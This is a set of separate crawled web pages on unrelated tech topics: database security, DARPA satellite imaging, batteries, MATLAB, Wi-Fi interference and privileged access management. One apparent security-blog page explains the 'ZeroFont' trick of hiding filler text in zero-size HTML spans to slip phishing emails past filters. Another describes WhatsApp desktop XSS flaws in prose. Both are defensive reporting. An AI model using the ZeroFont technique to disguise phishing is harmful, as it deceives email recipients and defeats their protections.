Databases are arguably still the most widespread technology for storing and managing business-critical digital information. Manufacturing process parameters, sensitive financial transactions, confidential customer records: all of this most valuable corporate data must be protected against compromises of its integrity and confidentiality without affecting its availability for business processes. The area of database security covers various security controls for the information itself stored and processed in database systems, underlying computing and network infrastructures, as well as applications accessing the data.
Among security risks databases are potentially exposed to are the following:
- Data corruption or loss through human errors, programming mistakes or sabotage;
- Inappropriate access to sensitive data by administrators or other accounts with excessive privileges;
- Malware, phishing and other types of cyberattacks that compromise legitimate user accounts;
- Security vulnerabilities or configuration problems in the database software, which may lead to data loss or availability issues;
- Denial of service attacks leading to disruption of legitimate access to data.
Consequently, multiple technologies and solutions have been developed to address these risks, as well as provide better activity monitoring and threat detection. Covering all of them in just one product rating would be quite difficult. Furthermore, KuppingerCole has long stressed the importance of a strategic approach towards information security. Therefore, customers are encouraged to look at database security products not as isolated point solutions, but as a part of an overall corporate security strategy based on a multi-layered architecture and unified by centralized management, governance and analytics.
In this Leadership Compass, however, we are focusing on a relatively narrow segment of database security solutions to avoid comparing functionally distinct products and to exclude market segments already covered in other KuppingerCole’s reports.
First and foremost, we are focusing primarily on security solutions for protecting traditional relational database management systems (RDBMS), which are still by far the most widespread type of databases used by enterprises; however, solutions that extend their protection to NoSQL databases as well are going to be rated higher. Secondly, we are not explicitly covering various general aspects of network or physical server security, identity and access management or other areas of information security not specific for databases, although providing these features or offering integrations with other security products may influence our ratings.
Still, we are putting a strong focus on integration into existing security infrastructures to provide consolidated monitoring, analytics, governance or compliance across multiple types of information stores and applications. Most importantly, this includes integrations with SIEM/SoC solutions, existing identity and access management systems and information security governance technologies.
Solutions offering support for multiple database types as well as extending their coverage to other types of digital information are expected to receive more favorable ratings as opposed to solutions tightly coupled only to a specific database (although we do recognize various benefits of such tight integration as well). The same applies to products supporting multiple deployment scenarios, especially in cloud-based and hybrid infrastructures.
Another crucial area to consider is development of applications based on the Security and Privacy by Design principles, which are soon going to become a legal obligation under the EU’s upcoming General Data Protection Regulation (GDPR). Database security solutions can play an important role in supporting developers in building comprehensive security and privacy-enhancing measures directly into their applications. Such measures may include transparent data encryption and masking, fine-grained dynamic access management, unified security policies across different environments and so on. We are taking these functions into account when calculating vendor ratings for this report as well.
These are the key functional areas of database security solutions we are looking for in this rating:
- Vulnerability assessment – this includes not just discovering known vulnerabilities in database products, but providing complete visibility into complex database infrastructures, detecting misconfigurations and, last but not least, the means for assessing and mitigating these risks.
- Data discovery and classification – although classification alone does not provide any protection, it serves as a crucial first step in defining proper security policies for different data depending on their criticality and compliance requirements.
- Data protection – this includes data encryption at rest and in transit, static and dynamic data masking and other technologies for protecting data integrity and confidentiality.
- Monitoring and analytics – this includes monitoring of database performance characteristics, as well as complete visibility in all access and administrative actions for each instance, including alerting and reporting functions. On top of that, advanced real-time analytics, anomaly detection and SIEM integration can be provided.
- Threat prevention – this includes various methods of protection from cyber-attacks such as denial-of-service or SQL injection, mitigation of unpatched vulnerabilities and other database-specific security measures.
- Access Management – this includes not just basic access controls to database instances, but more sophisticated dynamic policy-based access management, identifying and removing excessive user privileges, managing shared and service accounts, as well as detection and blocking of suspicious user activities.
- Audit and Compliance – this includes advanced auditing mechanisms beyond native capabilities, centralized auditing and reporting across multiple database environments, enforcing separation of duties, as well as tools supporting forensic analysis and compliance audits.
- Performance and Scalability – although not a security feature per se, it is a crucial requirement for all database security solutions to be able to withstand high loads, minimize performance overhead and to support deployments in high availability configurations. For certain critical applications, passive monitoring may still be the only viable option.
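To make the data-protection category above more concrete, the following sketch illustrates the idea behind data masking: redacting sensitive columns before query results reach low-privilege users, while trusted (and audited) roles see cleartext. The column names, roles, and masking policies here are hypothetical and not tied to any vendor in this rating:

```python
# Hypothetical illustration of data masking: redact sensitive columns
# in query results according to a per-column policy and the caller's role.
# Policies, roles, and formats are invented for illustration only.

def mask_value(value: str, kind: str) -> str:
    if kind == "credit_card":                 # keep only the last 4 digits
        return "*" * (len(value) - 4) + value[-4:]
    if kind == "email":                       # keep first letter and domain
        local, _, domain = value.partition("@")
        return local[0] + "***@" + domain
    return "****"                             # default: full redaction

POLICY = {"card_number": "credit_card", "email": "email", "ssn": "full"}

def mask_row(row: dict, user_role: str) -> dict:
    if user_role == "dba_audited":            # trusted, audited roles see cleartext
        return row
    return {col: mask_value(val, POLICY[col]) if col in POLICY else val
            for col, val in row.items()}

row = {"name": "Alice", "card_number": "4111111111111111",
       "email": "alice@example.com"}
masked = mask_row(row, "support")
print(masked["card_number"])   # ************1111
```

Commercial products implement this dynamically in a proxy or inside the database engine, driven by the classification and access policies discussed above, but the principle is the same.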
Below you will find a short summary of our findings including the diagrams showing vendors’ positions on KuppingerCole Leadership scales.
1.1 Overall Leadership
In the Overall Leadership rating, we find IBM and Oracle among the Leaders, which is completely unsurprising considering both companies’ global market presence, broad ranges of database security solutions and impressive financial strength. However, the fact that IBM’s solutions are database-agnostic, while half of Oracle’s portfolio focuses only on Oracle databases, has influenced KuppingerCole’s decision to position IBM as the overall leader in Database Security.

The rest of the vendors populate the Challengers segment. Lacking the combination of exceptionally strong market and product leadership, they trail somewhat behind the Leaders, but still deliver mature solutions excelling in certain functional areas. The segment includes both large veteran players with massive customer reach, like Imperva, Gemalto, Thales e-Security, McAfee and Fortinet, and smaller but impressively innovative companies like HexaTier, MENTIS Software and Axiomatics.

There are no Followers in this rating, indicating the overall maturity of the vendors represented in our Leadership Compass. Still, a number of smaller companies and startups with innovative products are entering the market and are worth mentioning outside of our rating. These companies are briefly covered in chapter 14, “Vendors to watch”.
Full article is available for registered users with free trial access or paid subscription.
Register and read on!
Sign up for the Professional or Specialist Subscription Packages to access the entire body of the KuppingerCole research library consisting of 700+ articles. | <urn:uuid:c05aec39-4b87-4fa5-b0b7-8cfd9c6e5692> | CC-MAIN-2022-40 | https://www.kuppingercole.com/research/lc70970/database-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00362.warc.gz | en | 0.928821 | 1,506 | 2.703125 | 3 |
DOD is developing new ways to get high-resolution images of spacecraft as part of a plan to build new satellites in orbit from parts salvaged from deactivated crafts.
The Defense Department’s research and development shop is developing a new method to get more detailed images of orbiting satellites.
Better imaging would allow the DOD to select dead or deactivated spacecraft for a related program that would use robots to build new satellites in orbit from parts salvaged from deactivated craft.
The primary goal of the Defense Advanced Research Projects Agency’s Galileo program is to get better, more timely images of objects in geosynchronous orbit from the ground, said program manager Air Force Lt. Col. Travis Blake.
But Galileo is also intended to support the agency’s Phoenix program, which aims to salvage usable antennas and other components from retired satellites. Being able to image spacecraft is key to the planning aspect of the Phoenix program, Blake said.
The Phoenix program aims to save on the cost of launching new satellites when older ones have died by robotically removing and re-using space apertures and antennas from the old satellites.
The program plans to develop a new class of small "satlets," or nano satellites, that could "ride along" with a commercial satellite and then be “attached to the antenna of a non-functional cooperating satellite robotically, essentially creating a new space system,” DARPA said.
The main challenge Galileo faces is that using ground-based telescopes to get detailed views of objects in geosynchronous orbit (22,000 miles up) would require mirrors that are too large to build or use efficiently. Instead, DARPA is working on a different imaging technique, interferometric imaging, to get detailed images.
Astronomers use interferometry techniques to track and image objects in space with multiple telescopes. However, this process currently takes time and requires extensive infrastructure such as long light tubes, mirrors and other equipment that inhibits participating telescopes’ range of movement.
DARPA’s goal is to replace the light tubes with flexible fiber optic cable, which would allow telescopes to move more freely on multiple axes and could significantly speed up the imaging of objects in orbit, Blake said.
Besides checking out non-functional satellites, another benefit of Galileo would be to allow satellite operators to determine if components such as solar panels have deployed properly, which could significantly help in resolving any problems that occur once a vehicle is deployed, he said. | <urn:uuid:47b44c98-a6c4-4313-88bf-8e2c0c515dc8> | CC-MAIN-2022-40 | https://gcn.com/emerging-tech/2012/01/darpa-seeks-ways-to-rebuild-space-junk/280766/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00362.warc.gz | en | 0.937866 | 507 | 3.21875 | 3 |
Recently, we have been seeing a number of phishing attacks using a simple strategy to get their blatant email spoofs past Microsoft's phishing scans. The font manipulation tactic, which we are calling ZeroFont, involves inserting hidden words with a font size of zero that is invisible to the recipient. This is a very old technique, seldom seen anymore, that was once used to bypass spam filters. What makes this attack interesting is that it is now being used to fool Microsoft's natural language processing.
What is natural language processing?
Phishing emails (especially Business Email Compromise attacks) use social engineering and fraudulent text to convince their targets to click a link, enter credentials, or perform some other insecure behavior. In order to block these types of attacks, Microsoft uses natural language processing to scan the content of emails for signs of impersonation or fraud. For example, if the email includes the text "© 2018 Apple Corporation. All rights reserved" in the footer, but the email is not from apple.com, it would be flagged as fraudulent. It uses natural language processing to try to interpret the context or intent of the text and correlate it with the sender. Emails that prompt for things like banking information, user accounts, password resets, and financial requests are scrutinized for authenticity. As Microsoft's filters have become better at reading emails, the attackers are finding ways to fool the language analyzers before they fool the end user. In the ZeroFont method, they have found a way to display different text to the Microsoft filters than what is seen by the end user.
The ZeroFont email
There are multiple examples of the ZeroFont method, but here's a typical scenario.
An email attempting to impersonate an Office 365 quota-limit notification is sent to a customer. The message looks like a common administrative service message phishing attack that would normally be caught but, in this case, it was not flagged by Microsoft as a phishing email. The following image shows what was displayed to the recipient:
The ZeroFont tactic
This email was not flagged by Microsoft because the hacker inserted random text throughout the email to break up the text strings that would trigger Microsoft's natural language processing. In some cases, random words are used. These inserted characters are embedded within HTML tags of the form <span style="FONT-SIZE: 0px">, giving them a font size of zero and making them invisible to the recipient of the email. Below is a screenshot of the raw HTML of the email content, showing the inserted ZeroFont characters.
When the recipient reads the email, all the text with "FONT-SIZE: 0px" disappears, leaving the text the attacker wants her to see. The HTML above looks like this to the user:
On the other hand, because Microsoft's filters read the plain text, regardless of font size, they see a seemingly random string of characters:
Microsoft cannot identify this as a spoofing email because the word "Microsoft" never appears intact in the raw, un-rendered text. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user.
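The whole trick can be reproduced in a few lines. The snippet below is a simplified sketch (the HTML fragment and filler characters are invented, not taken from the actual attack email): the same HTML yields one string when zero-font spans are dropped, as a browser effectively does, and a different string when all tags are stripped, as a plain-text scanner does.

```python
import re

# Hypothetical ZeroFont email fragment: the rendered text spells
# "Microsoft", but junk characters inside zero-font spans break the
# word up in the raw HTML.
html = ('M<span style="FONT-SIZE: 0px">xq</span>icro'
        '<span style="FONT-SIZE: 0px">zk</span>soft Office 365')

# What the recipient sees: zero-font spans collapse to nothing.
rendered = re.sub(r'<span style="FONT-SIZE: 0px">.*?</span>', '', html)

# What a plain-text scanner sees: tags stripped, hidden characters kept.
filtered = re.sub(r'<[^>]+>', '', html)

print(rendered)   # Microsoft Office 365
print(filtered)   # Mxqicrozksoft Office 365
```

The scanner never encounters the word "Microsoft", so the brand-impersonation check simply has nothing to match.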
You can see for yourself that what you see and what your anti-phishing filter reads might be completely different.
A convincing BEC email or phishing text can hide within a totally different context. An advanced filter or AI scanner should see exactly what you see; if it does not, your phishing filter will misread the message you are looking at.
Natural language processing is a vital and powerful tool in the prevention of email phishing attacks. The ZeroFont method is just one way attackers present one email to the security filters and another to the user. Other attacks achieve similar results through different methods, such as the Punycode, Unicode, and hexadecimal escape character phishing attacks.

Source: https://www.avanan.com/blog/zerofont-phishing-attack
A new type of lithium ion battery offering up to ten times the battery life and charging speed of current-generation cells has been announced.
Battery life is one of the biggest hurdles to technological advancement - particularly when it comes to mobile devices. The biggest gaming laptops last only a couple of hours, 'exoskeleton' robots require external generators or power cables, and electric cars need a thousand or more current-generation Li-ion cells to keep them going for a hundred or so miles. Charging time can also be a problem.
However, a team from Northwestern University in the US could be pointing the way to the future of mobile power. Recently publishing their findings in the journal Advanced Energy Materials, the group's hypothesis for future designs makes for some very interesting reading.
Hexus reports that the team's design works by changing the structure of the graphene sheets of a Li-ion battery by inserting clusters of silicon between them. This material has been considered in the past, since it is able to store four lithium ions per atom of silicon, whereas graphene can hold only one lithium ion per six carbon atoms.
However, the traditional problem with using silicon lies in the fact that the semiconductor has a tendency to flex and expand during charging, leading to a loss of capacity over time. The Northwestern method uses clusters of silicon between sheets of graphene, allowing the structure to be maintained while increasing the cell's charging capacity at the same time.
Charging time would also be improved, as the new method utilises 'holes' in the graphene sheets to funnel lithium ions straight to the silicon clusters and the next sheet of graphene. In current batteries, lithium ions must travel around each sheet in turn, slowing the process down dramatically.
It's thought that this technology could become commercially available within three to five years.

Source: https://www.itproportal.com/2011/11/15/new-li-ion-battery-design-offers-10x-capacity/
Security researcher Gal Weizman from PerimeterX disclosed technical details of a number of dangerous vulnerabilities (tracked together as CVE-2019-18426) found in the desktop version of the WhatsApp messenger.
Using these vulnerabilities, attackers could remotely steal files from computers running Windows or macOS.
“I really wanted to find a major security flaw in a well-known and widely used service, and I felt like WhatsApp was a good start. So I gave it a go since I already had some clue of existing security flaws in WhatsApp mobile and web applications. I managed to find four more unique security flaws in WhatsApp which led me all the way to persistent XSS and even reading from the local file system – by using a single message”, — writes Gal Weizman.
In particular, the specialist discovered a potentially dangerous Open Redirect vulnerability, which allows an attacker to conduct an XSS attack by sending a specially crafted message. If the victim views a malicious message, the attacker can execute arbitrary code in the context of the WhatsApp domain.
Another problem was the incorrectly configured Content Security Policy (CSP) on the WhatsApp web domain, which allows loading XSS payloads in iframes from a site controlled by an attacker.
“If the CSP rules were correctly configured, the impact of the XSS attack would have been smaller. The ability to bypass the CSP configuration allowed an attacker to steal valuable victim information, easily load external payloads, and much more”, – noted the expert.
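To illustrate why CSP configuration matters, here is a deliberately simplified Python sketch (my illustration, not an audit of WhatsApp's actual policy) that flags policies leaving iframe sources unrestricted:

```python
def csp_allows_arbitrary_frames(policy):
    # Crude check: parse "name value value; ..." directives, then see
    # whether frame sources are unrestricted. Real CSP has more fallback
    # rules; this only captures the flavor of the problem.
    directives = {}
    for part in policy.split(";"):
        if part.strip():
            name, *values = part.strip().split()
            directives[name] = values
    sources = (directives.get("frame-src")
               or directives.get("child-src")
               or directives.get("default-src"))
    return sources is None or "*" in sources

print(csp_allows_arbitrary_frames("default-src 'self'; script-src 'self'"))  # False
print(csp_allows_arbitrary_frames("default-src *"))                          # True
```

A policy that pins every source to trusted origins narrows what an XSS payload can load; a wildcard or missing directive leaves the iframe door open.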
Weizman demonstrated a remote file attack via WhatsApp, gaining access to the contents of the hosts file on the victim's computer. According to the researcher, the open redirect vulnerability could also be used to manipulate URL banners – the preview of a domain that WhatsApp displays to recipients when they receive a message containing links.
“It is 2020, no product should be allowing a full read from the file system and potentially a RCE from a single message”, – summed up Gal Weizman.
Weizman reported his discovery to Facebook, and the company released a patched desktop version of the messenger.
WhatsApp has a troubled security record: only recently I wrote that an attacker in a WhatsApp group chat could disable the messengers of other participants. The Internet, like the real world, remains a dangerous place.

Source: https://gridinsoft.com/blogs/dangerous-vulnerabilities-in-whatsapp-allowed-compromising-millions-of-users/
Today we learn about a specialized software package called MATLAB, which stands for 'Matrix Laboratory', used for high-performance mathematical calculation, visualization, and programming. It is an interactive environment providing hundreds of built-in functions for technical computing, graphics, and animation.
We will learn about MATLAB in more detail: its history, why it was developed, the MATLAB framework, and its benefits and use cases.
Definition – MATLAB
MATLAB was initially developed to provide a simple interface to the matrix software developed by two projects: LINPACK (Linear System Package) and EISPACK (Eigensystem Package).
It is a modern programming language and software environment with refined data structures, built-in editing and debugging tools, and support for object-oriented programming.
MATLAB was developed in the 1970s by Cleve Moler, the chairman of the computer science department at the University of New Mexico. Cleve wanted his students to use LINPACK and EISPACK (software libraries for numerical computing, written in FORTRAN) without having to learn FORTRAN. In 1984, Cleve Moler, together with Jack Little and Steve Bangert, rewrote MATLAB in C and founded MathWorks. These rewritten libraries are known as JACKPAC; they were revised in 2000 for matrix manipulation and renamed LAPACK.
MATLAB has five main components, each described in detail below.
- Development environment – a set of tools and facilities that help you use MATLAB functions and files. It comprises several GUI-based tools: the MATLAB desktop and command window, the command history, the editor and debugger, browsers, workspaces, reports, and the search path.
- MATLAB Mathematical Function Library – contains elementary functions like sum, sine, and cosine, as well as complex mathematical functions like matrix inverses, matrix eigenvalues, Bessel functions, and fast Fourier transforms.
- MATLAB language – a high-level matrix/array language with control flow statements, functions, data structures, input/output, and object-oriented programming features. It supports both 'programming in the small', for quick throwaway programs, and 'programming in the large', for building large and complex applications.
- Graphics – capabilities to display vectors and matrices as graphs, as well as to annotate and print those graphs. It includes high-level functions for two-dimensional and three-dimensional data visualization, image processing, and animation, plus low-level functions to fully customize the display of graphics or to build complete graphical user interfaces for MATLAB applications.
- MATLAB External Interface/API – a library that allows you to write C and FORTRAN programs that interact with MATLAB. It contains facilities for calling routines from MATLAB (dynamic linking), calling MATLAB as a computational engine, and reading and writing MAT-format files.
Features and Capabilities
Characteristics/Features of MATLAB
- Supports both symbolic and numerical computing
- High level language mainly for engineering and scientific computing
- Works within a desktop environment and provides full features for problem solving, iteration, and design
- Can create custom plots and tools for data visualization using built-in graphics
- Purpose-built apps address specific problems such as data classification, control system design and tuning, and signal analysis
- Several add-on toolboxes for building a wide range of engineering, scientific, and custom user-interface applications
- Interfaces are available to work with other programming languages such as C, C++, Java, .NET, Python, SQL, and Hadoop.
- Optimize complex processes and distributed systems
- Real time testing of test control systems and signal processing algorithms
- Development of embedded systems using model-based design
- Develop embedded code for prototypes or production
- Perform parallel computing with large scale systems
- Import or access data from other sources
- Work management by automation of processes
- Working with multiple cloud platforms – MathWorks cloud, AWS, Azure etc.
- Capable of mathematical modelling of complex systems
MATLAB Pros and Cons
- Efficient matrix and vector handling
- Quick analysis and plotting
- Extensive documentation available
- Lots of built-in functions: FFT, fuzzy logic, neural nets, numerical integration, OpenGL, etc.
- Multithreading support and garbage collection for parallel execution of algorithms
- Extensive mathematical package libraries supporting all fields of mathematics, from simple to complex computations
- Fastest IDE for mathematical computation of matrices and linear Algebra
- High-quality 2-D and 3-D data visualization, image processing, and animation
- Slow in comparison to other languages like C or Java
Applications of MATLAB
- Computational Biology – Biological data computation for analysis, visualization, and modelling
- Control systems – design , testing and implementation
- Data science – Data driven insights to improve designs and decisions
- Deep learning – Design, build and visualize neural networks
- Machine learning – Discovering new patterns to develop predictive models
- Wireless communications – design and testing of wireless communications
- Image processing – Image and video processing
- Internet of things – insight into data by connective embedded systems to Internet
- Data exploration and test automation
- Power electronics – Providing digital control for motors, power converters, and battery systems
- Biotech and pharmaceutical – data analysis for drug discovery, development, clinical trials, and manufacturing
And the list is never-ending…

Source: https://networkinterview.com/introduction-to-matlab/
Radio frequency (RF) interference can lead to disastrous problems on wireless LAN deployments. Many companies have gotten by without any troubles, but some have installations that don’t operate nearly as well as planned. The perils of interfering signals from external RF sources are often the culprit. As a result, it’s important that you’re fully aware of RF interference impacts and avoidance techniques.
Impacts of RF interference
As a basis for understanding the problems associated with RF interference in wireless LANs, let’s quickly review how 802.11 stations (client radios and access points) access the wireless (air) medium. Each 802.11 station only transmits packets when there is no other station transmitting. If another station happens to be sending a packet, the other stations will wait until the medium is free. The actual 802.11 medium access protocol is somewhat more complex, but this gives you enough of a starting basis.
RF interference involves the presence of unwanted, interfering RF signals that disrupt normal wireless operations. Because of the 802.11 medium access protocol, an interfering RF signal of sufficient amplitude and frequency can appear as a bogus 802.11 station transmitting a packet. This causes legitimate 802.11 stations to wait for indefinite periods of time before attempting to access the medium until the interfering signal goes away.
To make matters worse, RF interference doesn’t abide by the 802.11 protocols, so the interfering signal may start abruptly while a legitimate 802.11 station is in the process of transmitting a packet. If this occurs, the destination station will receive the packet with errors and not reply to the source station with an acknowledgement. In return, the source station will attempt retransmitting the packet, adding overhead on the network.
Of course, this all leads to network latency and unhappy users. In some cases, 802.11 protocols will attempt to continue operation in the presence of RF interference by automatically switching to a lower data rate, which also slows the use of wireless applications. The worst case, which is fairly uncommon, is that the 802.11 stations will hold off until the interfering signal goes completely away, which could take minutes, hours, or days.
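A back-of-the-envelope model (my illustration, not from the original article) shows how quickly retransmissions inflate airtime: if interference corrupts each transmission with independent probability p, the expected number of transmissions per delivered packet is 1/(1-p).

```python
def expected_transmissions(loss_rate):
    # Success on attempt k has probability (1 - p) * p**(k - 1), so the
    # attempt count is geometrically distributed with mean 1 / (1 - p).
    return 1.0 / (1.0 - loss_rate)

for p in (0.0, 0.25, 0.5):
    print(f"loss {p:.2f} -> {expected_transmissions(p):.2f} transmissions/packet")
```

At 50% corruption, every packet is sent twice on average; at 90%, ten times, and that is before counting the backoff delays the 802.11 protocol adds on top.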
Sources of RF interference
With 2.4 GHz wireless LANs, there are several sources of interfering signals, including microwave ovens, cordless phones, Bluetooth-enabled devices, FHSS wireless LANs, and neighboring wireless LANs. The most damaging of these are 2.4 GHz cordless phones that people use extensively in homes and businesses. If one of these phones is in use within the same room as a 2.4GHz (802.11b or 802.11g) wireless LAN, then expect poor wireless LAN performance when the phones are in operation. (Refer to a previous tutorial for results of testing interference from a cordless phone.)
A microwave oven operating within ten feet or so of an access point may also cause 802.11b/g performance to drop. Of course, the oven must be operating for the interference to occur, which may not happen very often depending on its usage. Bluetooth-enabled devices, such as laptops and PDAs, will cause performance degradation if operating in close proximity to 802.11 stations, especially if the 802.11 station is relatively far (i.e., at low signal levels) from the station it's communicating with. The presence of FHSS wireless LANs is rare, but when they're present, expect serious interference to occur. Other wireless LANs, such as one that your neighbor may be operating, can cause interference unless you coordinate the selection of 802.11b/g channels.
Use tools to “see” RF interference
Unless you’re Superman, you can’t directly see RF interference with only your eyes. Sure, you might notice problems in using the network that coincide with use of a device that may be causing the interference, such as turning on a microwave oven and noticing browsing the Internet slow dramatically, but having tools to confirm the source of the RF interference and possibly investigate potential sources of RF interference is crucial. For example, MetaGeek’s Wi-Spy is a relatively inexpensive USB-based Wi-Fi spectrum analyzer that indicates the amplitude of signals across the 2.4GHz frequency band. Figure 1 is a screenshot of the Wi-Spy display with a microwave oven operating ten feet away.
This clearly shows relatively high-level signals emanating from the microwave oven in the upper portion of the 2.4GHz frequency band, which indicates that you should tune any access points near this microwave oven to lower channels. To simplify matters, MetaGeek has an interference identification guide that you can use with Wi-Spy to help pinpoint interfering sources. The benefit of using a spectrum analyzer in this manner is that you can identify the interference faster and avoid guessing if a particular device is (or may) cause interference.
Take action to avoid RF interference
The following are tips you should consider for reducing RF interference issues:
Analyze the potential for RF interference. Do this before installing the wireless LAN by performing an RF site survey. Also, talk to people within the facility and learn about other RF devices that might be in use. This arms you with information that will help when deciding what course of action to take in order to reduce the interference.
Prevent the interfering sources from operating. Once you know the potential sources of RF interference, you may be able to eliminate them by simply turning them off. This is the best way to counter RF interference; however, it’s not always practical. For example, you can’t usually tell the company in the office space next to you to stop using their cordless phones; however, you might be able to disallow the use of Bluetooth-enabled devices or microwave ovens where your 802.11 users reside.
Provide adequate wireless LAN coverage. A good practice for reducing the impact of RF interference is to ensure the wireless LAN has strong signals throughout the areas where users will reside. If signals get too weak, then interfering signals will be more troublesome, similar to trying to talk to someone while a loud plane flies over your heads. Of course, this means doing a thorough RF site survey to determine the most effective number and placement of access points.
Set configuration parameters properly. If you’re deploying 802.11g networks, tune access points to channels that avoid the frequencies of potential interfering signals. This might not always work, but it’s worth a try. For example, as pointed out earlier in this tutorial, microwave ovens generally offer interference in the upper portion of the 2.4GHz band. As a result, you might be able to avoid microwave oven interference by tuning the access points near the microwave oven to channel 1 or 6 instead of 11.
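The arithmetic behind that channel advice is simple enough to sketch (a rough model of my own: 2.4 GHz channel centers sit 5 MHz apart starting at 2412 MHz, and an 802.11b signal occupies roughly 22 MHz):

```python
def channel_center_mhz(ch):
    # 2.4 GHz channels 1-13 are spaced 5 MHz apart, starting at 2412 MHz.
    return 2412 + 5 * (ch - 1)

def overlaps(a, b, width_mhz=22):
    # Two ~22 MHz-wide 802.11b signals interfere when their centers sit
    # closer together than one signal width.
    return abs(channel_center_mhz(a) - channel_center_mhz(b)) < width_mhz

print(channel_center_mhz(1), channel_center_mhz(6), channel_center_mhz(11))
# 2412 2437 2462
print(overlaps(1, 6), overlaps(1, 3))   # False True
```

That is why channels 1, 6, and 11 (25 MHz apart) are the standard non-overlapping trio, and why moving a nearby access point from channel 11 down to 1 or 6 can dodge microwave-oven energy in the upper part of the band.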
Deploy 5GHz wireless LANs. Most potential for RF interference today is in the 2.4 GHz band (i.e., 802.11b/g). If you find that other interference avoidance techniques don’t work well enough, then consider deploying 802.11a or 802.11n networks. In addition to avoiding RF interference, you’ll also receive much higher throughput.
The problem with RF interference is that it will likely change over time. For example, a neighbor may purchase a cordless phone and start using it frequently, or the use of wireless LANs in your area may increase. This means that the resulting impacts of RF interference may grow over time, or they may come and go. As a result, in addition to suspecting RF interference as the underlying problem for poor performance, investigate the potential for RF interference in a proactive manner.
Don’t let RF interference ruin your day. Keep a continual close watch on the use of wireless devices that might cause a hit on the performance of your wireless LAN.
Author Biography: Jim Geier provides independent consulting services and training to companies developing and deploying wireless networks for enterprises and municipalities. He is the author of a dozen books on wireless topics, with recent releases including Deploying Voice over Wireless LANs (Cisco Press) and Implementing 802.1x Security Solutions (Wiley).
Courtesy of Wi-Fi Planet

Source: https://www.datamation.com/networks/minimize-wlan-interference/
What Is PAM?
Privileged access management (PAM) is a system that assigns higher permission levels to accounts with access to critical resources and admin-level controls. PAM is based on the principle of least privilege, which is crucial to modern cybersecurity best practices.
Least privilege means making sure that users, programs, or processes have the bare minimum level of permission they need to perform their job or function. Users are only given access to read, write, or execute the documents or resources they require for their role. Least privilege can be used to restrict access controls to applications, devices, processes, and systems. Control can also be role-based, such as applying specific privileges to business departments like human resources, IT, and marketing, or based on factors like location, seniority, or the time of day.
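As a minimal sketch of what least-privilege, role-based control looks like in code (the roles and permission names below are invented for illustration):

```python
# Minimal deny-by-default, role-based permission check.
ROLE_PERMISSIONS = {
    "hr":        {"read:personnel"},
    "it_admin":  {"read:logs", "write:config", "reset:password"},
    "marketing": {"read:campaigns", "write:campaigns"},
}

def is_allowed(role, action):
    # Grant only what the role explicitly holds; unknown roles get nothing.
    return action in ROLE_PERMISSIONS.get(role, set())

print(is_allowed("hr", "read:personnel"))   # True
print(is_allowed("hr", "write:config"))     # False
```

The important property is deny-by-default: anything not explicitly granted to a role is refused.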
Privileged accounts are especially lucrative to cyber criminals. Such accounts have access or permission to resources and systems that contain highly confidential or sensitive information. They can make administrative changes to applications, IT infrastructure, and systems, and organizations use them to install hardware, make infrastructure updates, and reset passwords.
As a result, they present a serious security risk to organizations. Cyber criminals are especially interested in targeting privileged account credentials, which creates a pressing need for organizations to protect them.
There are many types of privileged accounts. Human privileged accounts include super users, domain administrators, local admins, emergency accounts, and privileged business users. It also includes non-human accounts, such as application and service accounts and secure socket shell (SSH) keys.
PAM encompasses privileged identity management (PIM), which lets organizations monitor and protect superuser accounts.
Privileged access is the process of designating higher access levels to certain files or systems. It enables organizations to secure applications and IT infrastructures, run their business more efficiently, and ensure their sensitive data and most critical infrastructure remain confidential. Privileged access can be applied to both human users and non-human users, such as applications and machines.
Privileged credentials, or privileged passwords, are the login details protecting privileged accounts and critical systems, which include applications, human users, and service accounts. A good example of privileged credentials is SSH keys, which are used to access servers and highly sensitive assets.
Privileged accounts are among the biggest targets for cyber criminals and consequently are one of the main sources of data breaches. Forrester Research insight suggests that 80% of breaches involve privileged credentials. Many major data breaches, such as the 2013 Target attack, were found to be a result of stolen credentials and could have been prevented if the organization had restricted access permissions.
Why PAM Is Needed
Privileged access management solutions are crucial to protecting the privileged accounts that exist across businesses’ on-premises and cloud environments. Privileged accounts often hold the key to confidential and sensitive information that can be hugely damaging for organizations if they fall into the wrong hands.
Privileged accounts are especially vulnerable because of the following risks and challenges:
Privileges Are Over-Distributed
It is easy for organizations to overprovision account privileges to resources that do not need them. Some users also end up accumulating new privileges or retaining privileges they no longer need when their job role changes. This privilege excess, in addition to the growth of cloud adoption and digital transformation, can lead to the organization’s attack surface expanding.
Having admin account privileges beyond what users require increases the risk of exposure to malware and hackers stealing their passwords. This allows unauthorized entities to access all privileges across an account, including all the data on an infected computer, or launch an attack against other computers or servers on the network.
Account and Password Sharing
Privileged credentials for services like Windows Administrator are often shared so that duties and workloads can be redistributed as required. But sharing passwords can make it impossible to attribute malicious actions to a single user, which creates issues around auditing, compliance, and security.
Lack of Privilege Visibility
It is common for growing organizations to have old, no-longer-used privileged accounts sprawled across their systems. For example, accounts belonging to former employees may be abandoned but still retain privileged access rights. These dormant accounts are vulnerable to hackers and can provide a backdoor into an organization's networks and systems.
Organizations therefore need to retain full visibility of their account access levels and remove any with unnecessary privileges.
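Regaining that visibility is often a matter of sweeping the account inventory. A minimal sketch (the account records and 90-day policy below are invented for illustration):

```python
from datetime import date, timedelta

# Toy account inventory; names and dates are made up for the demo.
accounts = [
    {"name": "svc-backup", "privileged": True,  "last_login": date(2019, 3, 1)},
    {"name": "jdoe-admin", "privileged": True,  "last_login": date(2020, 4, 1)},
    {"name": "jsmith",     "privileged": False, "last_login": date(2018, 1, 1)},
]

def dormant_privileged(accounts, today, max_idle_days=90):
    # Flag privileged accounts untouched for longer than the policy window.
    cutoff = today - timedelta(days=max_idle_days)
    return [a["name"] for a in accounts
            if a["privileged"] and a["last_login"] < cutoff]

print(dormant_privileged(accounts, date(2020, 4, 15)))  # ['svc-backup']
```

Any account the sweep flags should be reviewed and, if no longer needed, deprovisioned rather than left as a standing backdoor.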
Inconsistent Credential Enforcement
Silos within organizations can result in inconsistent privileged accounts enforcement and credential management. Large organizations may have thousands or even millions of privileged accounts, which is impossible for IT teams to manage manually. Furthermore, with so many accounts to manage, shortcuts are likely to occur and credentials can be re-used across multiple accounts. These factors jeopardize the security of all the accounts in the system.
Complex Compliance Requirements
PAM security enables risk management around applications, network devices, and systems and helps organizations record all activities relating to critical infrastructure. This is ideal for creating a more audit-friendly IT environment.
